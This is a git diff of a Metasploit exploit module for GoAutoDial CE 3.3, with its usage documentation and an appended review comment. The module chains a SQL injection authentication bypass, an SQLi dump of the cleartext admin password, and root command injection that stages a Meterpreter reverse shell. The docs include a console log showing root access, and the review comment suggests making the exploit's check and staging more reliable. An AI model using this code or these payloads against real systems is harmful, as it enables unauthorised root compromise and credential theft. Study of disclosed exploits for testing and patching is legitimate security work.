Add command stager and code cleanup
parent
b3be89b508
commit
8e2ff7a4c5
|
@ -1,52 +1,51 @@
|
||||||
## Description
|
## Description
|
||||||
|
|
||||||
This module exploits a SQL injection flaw and command injection flaw within GoAutoDial CE 3.3, which permits authentication bypass and a complete compromise of the underlying system with root privileges. This module also extracts the administrative users password from the underlying database.
|
This module exploits a SQL injection flaw and command injection flaw within GoAutoDial CE 3.3, which permits authentication bypass and a complete compromise of the underlying system with root privileges. This module also extracts the administrative users password from the underlying database.
|
||||||
|
|
||||||
## Affected software
|
## Affected software
|
||||||
|
|
||||||
GoAutoDial 3.3 CE (32bit and 64bit) is available for download from goautodial.org. In order to download, register a free account then download the bootable ISOs. Both ISOs have been used for the dev of this. http://goautodial.org/attachments/download/3237/goautodial-32bit-ce-3.3-final.iso.html
|
GoAutoDial 3.3 CE (32bit and 64bit) is available for download from goautodial.org. In order to download, register a free account then download the bootable ISOs. Both ISOs have been used for the dev of this. http://goautodial.org/attachments/download/3237/goautodial-32bit-ce-3.3-final.iso.html
|
||||||
Refer to: https://www.exploit-db.com/exploits/36807/
|
Refer to: https://www.exploit-db.com/exploits/36807/
|
||||||
|
|
||||||
## Verification
|
## Verification
|
||||||
List the steps needed to make sure this thing works
|
|
||||||
|
|
||||||
- Start `msfconsole`
|
- Start `msfconsole`
|
||||||
- Do `use exploit/linux/http/goautodial_3_rce_command_injection`
|
- Do `use exploit/linux/http/goautodial_3_rce_command_injection`
|
||||||
- Do `set payload cmd/unix/reverse_bash`
|
|
||||||
- Do `set RHOST <IP>`
|
- Do `set RHOST <IP>`
|
||||||
- Do `set LHOST <IP>`
|
- Do `set LHOST <IP>`
|
||||||
- Do `set LPORT <PORT>`
|
- Do `set LPORT <PORT>`
|
||||||
|
- Do `run`
|
||||||
- Wait for shell
|
- Wait for shell
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
```
|
```
|
||||||
|
msf > use exploit/linux/http/goautodial_3_rce_command_injection
|
||||||
|
msf exploit(goautodial_3_rce_command_injection) > set rhost 172.16.191.150
|
||||||
|
rhost => 172.16.191.150
|
||||||
msf exploit(goautodial_3_rce_command_injection) > check
|
msf exploit(goautodial_3_rce_command_injection) > check
|
||||||
[+] 192.168.0.76:443 The target is vulnerable.
|
[+] 172.16.191.150:443 The target is vulnerable.
|
||||||
msf exploit(goautodial_3_rce_command_injection) > exploit -z
|
msf exploit(goautodial_3_rce_command_injection) > set lhost 172.16.191.181
|
||||||
|
lhost => 172.16.191.181
|
||||||
|
msf exploit(goautodial_3_rce_command_injection) > run
|
||||||
|
|
||||||
[*] Started reverse TCP handler on 192.168.0.11:4444
|
[*] Started reverse TCP handler on 172.16.191.181:4444
|
||||||
[*] 192.168.0.76:443 - Trying SQL injection...
|
[*] 172.16.191.150:443 - Trying SQL injection...
|
||||||
[+] Authentication Bypass (SQLi) was successful
|
[+] 172.16.191.150:443 - Authentication Bypass (SQLi) was successful
|
||||||
[*] 192.168.0.76:443 - Dumping admin password...
|
[*] 172.16.191.150:443 - Dumping admin password...
|
||||||
[+] admin|goautodial|Admin|||Y
|
[+] 172.16.191.150:443 - Found credentials: admin|goautodial|Admin|||Y
|
||||||
[*] 192.168.0.76:443 - Sending payload...waiting for connection
|
[*] 172.16.191.150:443 - Sending payload...
|
||||||
[*] Command shell session 7 opened (192.168.0.11:4444 -> 192.168.0.76:37338) at 2017-06-18 01:40:41 +1000
|
[*] Command Stager progress - 68.67% done (798/1162 bytes)
|
||||||
[*] Session 7 created in the background.
|
[*] Sending stage (2854264 bytes) to 172.16.191.150
|
||||||
msf exploit(goautodial_3_rce_command_injection) > sessions -u 7
|
[*] Meterpreter session 1 opened (172.16.191.181:4444 -> 172.16.191.150:52876) at 2017-07-02 11:08:02 -0400
|
||||||
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [7]
|
[*] Command Stager progress - 100.00% done (1162/1162 bytes)
|
||||||
|
|
||||||
[*] Upgrading session ID: 7
|
|
||||||
[*] Starting exploit/multi/handler
|
|
||||||
[*] Started reverse TCP handler on 192.168.0.11:4433
|
|
||||||
[*] Starting the payload handler...
|
|
||||||
[*] Sending stage (797784 bytes) to 192.168.0.76
|
|
||||||
[*] Meterpreter session 8 opened (192.168.0.11:4433 -> 192.168.0.76:58124) at 2017-06-18 01:41:04 +1000
|
|
||||||
[*] Command stager progress: 100.00% (668/668 bytes)
|
|
||||||
msf exploit(goautodial_3_rce_command_injection) > sessions -i 8
|
|
||||||
[*] Starting interaction with 8...
|
|
||||||
|
|
||||||
meterpreter > getuid
|
meterpreter > getuid
|
||||||
Server username: uid=0, gid=0, euid=0, egid=0
|
Server username: uid=0, gid=0, euid=0, egid=0
|
||||||
meterpreter > sysinfo
|
meterpreter > sysinfo
|
||||||
Computer : test
|
Computer : go.goautodial.org
|
||||||
OS : CentOS 5.10 (Linux 2.6.18-371.11.1.el5)
|
OS : CentOS 5.11 (Linux 2.6.18-407.el5)
|
||||||
Architecture : x64
|
Architecture : x64
|
||||||
Meterpreter : x86/linux
|
Meterpreter : x64/linux
|
||||||
|
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
|
@ -7,12 +7,15 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
Rank = ExcellentRanking
|
Rank = ExcellentRanking
|
||||||
|
|
||||||
include Msf::Exploit::Remote::HttpClient
|
include Msf::Exploit::Remote::HttpClient
|
||||||
|
include Msf::Exploit::CmdStager
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(update_info(info,
|
||||||
'Name' => "GoAutoDial 3.3 Authentication Bypass / Command Injection",
|
'Name' => 'GoAutoDial 3.3 Authentication Bypass / Command Injection',
|
||||||
'Description' => %q{
|
'Description' => %q{
|
||||||
This module exploits a SQL injection flaw in the login functionality for GoAutoDial version 3.3-1406088000 and below, and attempts to perform command injection. This also attempts to retrieve the admin user details, including the cleartext password stored in the underlying database. Command injection will be performed with root privileges. The default pre-packaged ISO builds are available from goautodial.org. Currently, the hardcoded command injection payload is an encoded reverse-tcp bash one-liner and the handler should be setup to receive it appropriately.
|
This module exploits a SQL injection flaw in the login functionality for GoAutoDial version 3.3-1406088000 and below, and attempts to perform command injection. This also attempts to retrieve the admin user details, including the cleartext password stored in the underlying database. Command injection will be performed with root privileges.
|
||||||
|
|
||||||
|
This module has been tested successfully on GoAutoDial version 3.3-1406088000.
|
||||||
},
|
},
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'Author' =>
|
'Author' =>
|
||||||
|
@ -24,12 +27,17 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
['CVE', '2015-2843'],
|
['CVE', '2015-2843'],
|
||||||
['CVE', '2015-2845']
|
['CVE', '2015-2845']
|
||||||
],
|
],
|
||||||
'Platform' => %w{unix},
|
'Platform' => 'linux',
|
||||||
'Arch' => ARCH_CMD,
|
'Arch' => [ ARCH_X86, ARCH_X64 ],
|
||||||
'Targets' => [ ['Automatic', {} ] ],
|
'Targets' => [ ['Automatic', {} ] ],
|
||||||
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' },
|
'DefaultOptions' =>
|
||||||
|
{
|
||||||
|
'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',
|
||||||
|
'CMDSTAGER::FLAVOR' => 'echo'
|
||||||
|
},
|
||||||
|
'CmdStagerFlavor' => %w{ echo printf wget },
|
||||||
'DefaultTarget' => 0,
|
'DefaultTarget' => 0,
|
||||||
'Privileged' => false,
|
'Privileged' => true,
|
||||||
'DisclosureDate' => 'Apr 21 2015'))
|
'DisclosureDate' => 'Apr 21 2015'))
|
||||||
|
|
||||||
register_options(
|
register_options(
|
||||||
|
@ -42,19 +50,28 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
|
|
||||||
|
|
||||||
def check
|
def check
|
||||||
res = check_version()
|
res = check_version
|
||||||
if res and res.body =~ /1421902800/
|
|
||||||
return Exploit::CheckCode::Safe
|
unless res
|
||||||
else
|
vprint_status "#{peer} Connection failed"
|
||||||
return Exploit::CheckCode::Vulnerable
|
return CheckCode::Unknown
|
||||||
end
|
|
||||||
end
|
end
|
||||||
|
|
||||||
def check_version()
|
unless res.code == 200 && res.body =~ /goautodial/
|
||||||
|
return CheckCode::Safe
|
||||||
|
end
|
||||||
|
|
||||||
|
unless res.body =~ /1421902800/
|
||||||
|
return CheckCode::Vulnerable
|
||||||
|
end
|
||||||
|
|
||||||
|
CheckCode::Safe
|
||||||
|
end
|
||||||
|
|
||||||
|
def check_version
|
||||||
uri = target_uri.path
|
uri = target_uri.path
|
||||||
|
|
||||||
send_request_cgi({
|
send_request_cgi({
|
||||||
'method' => 'GET',
|
|
||||||
'uri' => normalize_uri(uri, 'changelog.txt'),
|
'uri' => normalize_uri(uri, 'changelog.txt'),
|
||||||
'headers' => {
|
'headers' => {
|
||||||
'User-Agent' => 'Mozilla/5.0',
|
'User-Agent' => 'Mozilla/5.0',
|
||||||
|
@ -63,7 +80,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
})
|
})
|
||||||
end
|
end
|
||||||
|
|
||||||
def sqli_auth_bypass()
|
def sqli_auth_bypass
|
||||||
uri = target_uri.path
|
uri = target_uri.path
|
||||||
|
|
||||||
send_request_cgi({
|
send_request_cgi({
|
||||||
|
@ -75,67 +92,72 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
},
|
},
|
||||||
'vars_post' => {
|
'vars_post' => {
|
||||||
'user_name' => 'admin',
|
'user_name' => 'admin',
|
||||||
'user_pass' => '\'%20or%20\'1\'%3D\'1'
|
'user_pass' => "' or '"
|
||||||
}
|
}
|
||||||
})
|
})
|
||||||
end
|
end
|
||||||
|
|
||||||
def sqli_admin_pass(cookies)
|
def sqli_admin_pass
|
||||||
uri = target_uri.path
|
uri = target_uri.path
|
||||||
|
|
||||||
send_request_cgi({
|
send_request_cgi({
|
||||||
'method' => 'GET',
|
'uri' => normalize_uri(uri, 'index.php', 'go_site', 'go_get_user_info', Rex::Text.uri_encode("' OR active='Y")),
|
||||||
'uri' => normalize_uri(uri, 'index.php', 'go_site', 'go_get_user_info', '\'%20OR%20active=\'Y'),
|
'cookie' => @cookie,
|
||||||
'headers' => {
|
'headers' => {
|
||||||
'User-Agent' => 'Mozilla/5.0',
|
'User-Agent' => 'Mozilla/5.0',
|
||||||
'Accept-Encoding' => 'identity',
|
'Accept-Encoding' => 'identity'
|
||||||
'Cookie' => cookies
|
|
||||||
}
|
}
|
||||||
})
|
})
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
# Run the actual exploit
|
# Run the command stager
|
||||||
#
|
#
|
||||||
def execute_command()
|
def execute_command(cmd, opts = {})
|
||||||
|
|
||||||
encoded = Rex::Text.encode_base64("#{payload.encoded}")
|
params = "|echo -n #{Rex::Text.encode_base64(cmd)} |base64 --decode|bash"
|
||||||
params = "||%20bash%20-c%20\"eval%20`echo%20-n%20" + encoded + "%20|%20base64%20--decode`\""
|
|
||||||
uri = target_uri.path
|
uri = target_uri.path
|
||||||
|
|
||||||
send_request_cgi({
|
send_request_cgi({
|
||||||
'method' => 'GET',
|
'uri' => normalize_uri(uri, 'index.php', 'go_site', 'cpanel', Rex::Text.uri_encode(params)),
|
||||||
'uri' => normalize_uri(uri, 'index.php', 'go_site', 'cpanel', params),
|
'cookie' => @cookie,
|
||||||
'headers' => {
|
'headers' => {
|
||||||
'User-Agent' => 'Mozilla/5.0',
|
'User-Agent' => 'Mozilla/5.0',
|
||||||
'Accept-Encoding' => 'identity',
|
'Accept-Encoding' => 'identity'
|
||||||
'Cookie' => @cookie
|
|
||||||
}
|
}
|
||||||
})
|
})
|
||||||
end
|
end
|
||||||
|
|
||||||
|
def exploit
|
||||||
|
print_status("#{peer} - Trying SQL injection...")
|
||||||
|
res = sqli_auth_bypass
|
||||||
|
|
||||||
def exploit()
|
unless res
|
||||||
print_status("#{rhost}:#{rport} - Trying SQL injection...")
|
fail_with(Failure::Unknown, 'Connection failed')
|
||||||
res1 = sqli_auth_bypass()
|
end
|
||||||
|
|
||||||
if res1 && res1.code == 200
|
if res.code == 200 && res.get_cookies.include?('go_session')
|
||||||
print_good('Authentication Bypass (SQLi) was successful')
|
print_good("#{peer} - Authentication Bypass (SQLi) was successful")
|
||||||
else
|
else
|
||||||
print_error('Error: Run \'check\' command to identify whether the auth bypass has been fixed')
|
fail_with(Failure::NotVulnerable, "Run 'check' command to identify whether the auth bypass has been fixed")
|
||||||
end
|
end
|
||||||
|
|
||||||
@cookie = res1.get_cookies
|
@cookie = res.get_cookies
|
||||||
print_status("#{rhost}:#{rport} - Dumping admin password...")
|
print_status("#{peer} - Dumping admin password...")
|
||||||
res = sqli_admin_pass(@cookie)
|
res = sqli_admin_pass
|
||||||
|
|
||||||
if res
|
unless res
|
||||||
print_good(res.body)
|
fail_with(Failure::Unknown, 'Connection failed')
|
||||||
|
end
|
||||||
|
|
||||||
|
# Example response: admin|goautodial|Admin|||Y
|
||||||
|
if res.body.include?('|')
|
||||||
|
print_good("#{peer} - Found credentials: #{res.body}")
|
||||||
else
|
else
|
||||||
print_error('Error: No creds returned, possible mitigations are in place.')
|
fail_with(Failure::NotVulnerable, 'No creds returned, possible mitigations are in place.')
|
||||||
end
|
end
|
||||||
print_status("#{rhost}:#{rport} - Sending payload...waiting for connection")
|
|
||||||
|
|
||||||
execute_command()
|
print_status("#{peer} - Sending payload...")
|
||||||
|
execute_cmdstager(:linemax => 800)
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
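Review bot: In `check` (hunk `@@ -42,19 +50,28 @@`), a non-200 response or a `changelog.txt` body that does not match `/goautodial/` returns `CheckCode::Safe`, which reports the host as confirmed not vulnerable when the check merely failed to identify the product; a removed or access-restricted changelog on a still-vulnerable install becomes a false negative. That first guard should return `CheckCode::Unknown` instead, reserving `Safe` for the case where the `1421902800` fix marker is actually present: `return CheckCode::Unknown` in place of the first `return CheckCode::Safe`. Separately, `execute_command` (last hunk) discards the `send_request_cgi` result, so a stager chunk that fails (expired `go_session` cookie, non-200) is never surfaced; a `vprint_error("#{peer} - Stager request failed")` when the response is nil or `res.code != 200` would make a broken staging run diagnosable.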